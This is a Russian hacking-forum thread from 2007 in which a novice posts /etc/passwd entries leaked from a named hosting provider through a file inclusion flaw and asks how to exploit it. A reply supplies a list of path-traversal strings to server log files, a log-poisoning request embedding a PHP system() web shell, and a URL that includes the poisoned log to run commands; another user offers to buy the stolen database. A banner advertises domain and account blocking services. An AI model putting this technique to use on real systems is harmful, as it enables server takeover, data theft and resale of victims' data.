Форум АНТИЧАТ - Как воспользоваться php иньекцией

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Как воспользоваться php иньекцией

Опции темы

Поиск в этой теме

Опции просмотра

Как воспользоваться php иньекцией

28.08.2007, 09:05

ANTI-4URKA

Новичок

Регистрация: 19.08.2007

Сообщений: 2

Провел на форуме:
1292

Репутация: 0

Как воспользоваться php иньекцией

вот с хостера robo-host.ru
выводиться в таком виде пхп иньекция:
подскажит как воспользоваться и что даёт этот код:

dvdrec:x:32383:32384::/home/dvdrec:/bin/false dyakoff:x:32386:32387::/home/dyakoff:/usr/local/cpanel/bin/noshell

egtgame:x:32388:32389::/home/egtgame:/usr/local/cpanel/bin/jailshell elektrok:x:32391:32392::/home/elektrok:/usr/local/cpanel/bin/jailshell

elitmebe:x:32392:32393::/home/elitmebe:/usr/local/cpanel/bin/jailshell wapoorg:x:32393:32394::/home/wapoorg:/usr/local/cpanel/bin/noshell

28.08.2007, 09:15

ANTI-4URKA

Новичок

Регистрация: 19.08.2007

Сообщений: 2

Провел на форуме:
1292

Репутация: 0

что?
обьясни плз я непонимаю (

28.08.2007, 09:16

aka PSIH

Постоянный

Регистрация: 07.02.2006

Сообщений: 630

Провел на форуме:
12985021

Репутация: 676

ищи файл acces_log & error_log

Цитата:

../../../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../../../var/log/httpd/error_log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../apache/logs/error.log
../../../../apache/logs/access.log
../../../../../apache/logs/error.log
../../../../../apache/logs/access.log
../../../../../../apache/logs/error.log
../../../../../../apache/logs/access.log
../../../../../../../apache/logs/error.log
../../../../../../../apache/logs/access.log
../../../../../../../../apache/logs/error.log
../../../../../../../../apache/logs/access.log
../../../logs/error.log
../../../logs/access.log
../../../../logs/error.log
../../../../logs/access.log
../../../../../logs/error.log
../../../../../logs/access.log
../../../../../../logs/error.log
../../../../../../logs/access.log
../../../../../../../logs/error.log
../../../../../../../logs/access.log
../../../../../../../../logs/error.log
../../../../../../../../logs/access.log
../../../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../../../var/log/access_log
../../../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../../../var/log/access_log
../../../../../../../../../../../../var/log/error_log

затем посылай серверу запрос:
GET <?system($_GET["cmd"]);?> HTTP/1.1

HOST: site.com

Затем через инклуд подключаешь найденный access_log, и выполняешь команды...
www.site.com/index.php?page=../../../../../../../../logs/access_log&cmd=id

правда мало шансов что проканает....

)

Видео
(с)homo-sapiens

Последний раз редактировалось aka PSIH; 28.08.2007 в 09:20..

28.08.2007, 09:25

n1†R0x

Постоянный

Регистрация: 20.01.2007

Сообщений: 787

Провел на форуме:
2924346

Репутация: 1719

Отправить сообщение для n1†R0x с помощью ICQ

Вот еще советую прочитать:
вопрос по etc/passwd

28.08.2007, 09:39

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

Провел на форуме:
3887520

Репутация: 2996

n1†R0x
Посмотри там 1 пост там есть /etc/passwd.

ANTI-4URKA
Сломаешь стукни мне, возможно куплю бд.

28.08.2007, 09:42

n1†R0x

Постоянный

Регистрация: 20.01.2007

Сообщений: 787

Провел на форуме:
2924346

Репутация: 1719

Цитата:

Сообщение от [ cash ]

n1†R0x
Посмотри там 1 пост там есть /etc/passwd.

[ cash ]
В той теме задавался похожий вопрос, "что можно поиметь с etc/passwd". На мой взгляд, ettee достаточно развернуто ответил на него.

28.08.2007, 09:49

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

Провел на форуме:
3887520

Репутация: 2996

n1†R0x
возможно я наркоман но тут нету постов ettee...

28.08.2007, 09:57

n1†R0x

Постоянный

Регистрация: 20.01.2007

Сообщений: 787

Провел на форуме:
2924346

Репутация: 1719

Цитата:

Сообщение от [ cash ]

n1†R0x
возможно я наркоман но тут нету постов ettee...

[ cash ]
В пятом посте ссылочка на тему, я про нее (про тему) и говорил )))

Последний раз редактировалось n1†R0x; 28.08.2007 в 10:09..

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Подробный Faq о открытии некоторых моделей домофонов	system_32	Электроника и Фрикинг	23	18.12.2008 14:25
Кейлогер на Vb или как правильно играть в Gta!!!	je0n	Авторские статьи	6	25.05.2007 23:55
Как можно инклюдить Php файлы в Html???	Linuxoid	PHP, PERL, MySQL, JavaScript	19	16.05.2007 15:57
Защищаем Php. Шаг за шагом.	k00p3r	Чужие Статьи	0	13.06.2005 11:31

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход